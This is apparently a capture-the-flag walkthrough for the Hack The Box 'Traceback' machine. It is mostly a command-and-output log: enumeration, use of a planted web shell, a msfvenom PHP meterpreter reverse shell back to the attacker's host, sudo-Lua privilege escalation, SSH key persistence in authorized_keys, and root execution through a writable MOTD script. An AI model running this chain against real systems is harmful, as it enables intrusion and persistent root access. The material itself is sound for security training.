Solution for user
IP=10.10.10.181
nmap -sT -p 1-65535 $IP
...
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpSpider for website content
URL="http://10.10.10.181"
WL=/usr/share/dirb/wordlists/common.txt
gobuster dir -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
...
http://10.10.10.181/.hta (Status: 403)
http://10.10.10.181/.htaccess (Status: 403)
http://10.10.10.181/.htpasswd (Status: 403)
http://10.10.10.181/index.html (Status: 200)
http://10.10.10.181/server-status (Status: 403)Information gathering
whatweb "$URL"
/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete
http://10.10.10.181 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.10.181], Title[Help us]View page source code
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<!--Some of the best web shells that you might need ;)-->Look for a web shell
cd /usr/share/wordlists
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Common-PHP-Filenames.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
WL=/usr/share/wordlists/Common-PHP-Filenames.txt
gobuster dir -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
#Nothing found
WL=/usr/share/wordlists/CommonBackdoors-PHP.fuzz.txt
gobuster dir -u $URL -w $WL -s '200,204,301,302,307,403,500' -e
...
http://10.10.10.181/smevk.php (Status: 200)
We found a web shell at http://10.10.10.181/smevk.php
Find the credentials for web shell
Basic guessing…
Try admin/admin
It works...Obtain a reverse shell
KALI_IP=x.x.x.x
LISTENER_PORT=4444
msfvenom -p php/meterpreter/reverse_tcp LHOST=$KALI_IP LPORT=$LISTENER_PORT -f raw > php_shell.phpUpload php_shell.php using the web shell GUI.
Start the listener
msfconsole
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST x.x.x.x
set LPORT 4444
set ExitOnSession false
exploit -j -zGo to http://10.10.10.181/php_shell.php
sessions -l -v
sessions -i 1
sysinfo
Computer : traceback
OS : Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64
Meterpreter : php/linuxWe got a meterpreter shell.
shellwhoami
webadmincd /home/webadmin
ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txtcat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.Lua is a programming language.
cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logoutsudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvitEscalate privileges using Lua
https://gtfobins.github.io/gtfobins/lua/
echo 'os.execute("/bin/bash")' > /tmp/cmd.lua
sudo -u sysadmin /home/sysadmin/luvit /tmp/cmd.luawhoami
sysadminGet user flag
cat /home/sysadmin/user.txt
9baf9db465099a6dabd8fb3bcd7a5d3f
Solution for root
To make it easier to work with, add my Kali public key to sysadmin’s authorized keys.
On Kali
cat /root/.ssh/id_rsa.pubOn target
echo 'ssh-rsa AAAA...jBBc= root@machine' >> authorized_keysOn Kali
ssh -i ~/.ssh/id_rsa sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land/bin/bash
sysadmin@traceback:~$ Much better… 😉
# Find writable files / dirs outside of your home directory
find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/10-help-text
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/80-esm
...Investigate the interesting welcome message…
Executable scripts in /etc/update-motd.d/* are executed by pam_motd(8) as the root user at each login. The way the MOTD (Message of the Day Works) is when a user logs into the box, they will be presented a message.
grep -Ril "XH4H" / 2>/dev/null
/etc/update-motd.d/00-header
/var/www/html/index.html
/var/backups/.update-motd.d/00-header
/var/run/motd.dynamiccd /etc/update-motd.d
ls -la
...
-rwxrwxr-x 1 root sysadmin 981 Jul 2 12:56 00-header
-rwxrwxr-x 1 root sysadmin 982 Jul 2 12:56 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Jul 2 12:56 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Jul 2 12:56 80-esm
-rwxrwxr-x 1 root sysadmin 299 Jul 2 12:56 91-release-upgradeCreate a script that will be triggered at login by Message of the day (MOTD)
nano /home/sysadmin/escalate.sh
#!/bin/bash
cat /root/root.txt
chmod u+x /home/sysadmin/escalate.shecho "sh /home/sysadmin/escalate.sh" >> /etc/update-motd.d/00-header
echo "echo Was here..." >> /etc/update-motd.d/00-headerLog again to trigger the script and display the flag
ssh -i ~/.ssh/id_rsa sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
ba97fda55e7cc0b2d5796bfa6985fab3ba97fda55e7cc0b2d5796bfa6985fab3